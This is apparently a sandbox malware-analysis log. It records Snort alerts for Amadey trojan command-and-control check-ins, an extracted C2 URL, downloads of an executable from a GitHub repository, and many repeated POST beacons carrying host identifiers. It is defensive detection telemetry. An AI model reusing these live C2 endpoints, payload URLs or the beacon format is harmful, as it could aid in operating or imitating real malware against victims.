                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49899 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49900 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49902 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49903 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49907 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49909 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49913 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49914 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49917 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49927 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49928 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49930 -> 80.66.64.103:80
                        Source: Malware configuration extractorURLs: sigint.ws/f8dfksdj3/index.php
                        Source: global trafficHTTP traffic detected: GET /760 HTTP/1.1Host: north.acConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /neiqops/ajajaj/main/file_22613.exe HTTP/1.1Connection: Keep-AliveHost: raw.githubusercontent.com
                        Source: global trafficHTTP traffic detected: GET /760 HTTP/1.1Host: north.acConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /hyipsdigest HTTP/1.1Host: t.me
                        Source: global trafficHTTP traffic detected: GET /760 HTTP/1.1Host: north.acConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1Host: github.com
                        Source: global trafficHTTP traffic detected: GET /760 HTTP/1.1Host: north.acConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 37 30 30 31 26 75 6e 69 74 3d 34 32 35 36 32 30 38 38 33 33 39 32 Data Ascii: d1=1000007001&unit=425620883392
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
